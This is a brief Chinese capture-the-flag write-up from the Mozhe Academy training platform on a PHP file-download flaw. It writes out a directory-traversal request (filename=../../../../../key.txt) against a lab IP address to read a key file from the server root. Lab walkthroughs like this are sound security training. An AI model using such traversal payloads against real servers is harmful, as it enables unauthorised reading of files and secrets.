墨者学院 - PHP文件下载漏洞分析溯源
2018-11-05 本文已影响0人
这是什么娃哈哈
1.打开题目,如图1所示
2.随便下载一个图片发现,貌似是文件包含漏洞,如图2所示
图2
3.由于题目提示,key在根目录,我们尝试../../../../../回到根目录,如图3所示
构造注入连接:http://219.153.49.228:47183/execdownload.php?filename=../../../../../key.txt
图3
下载打开即可获取key。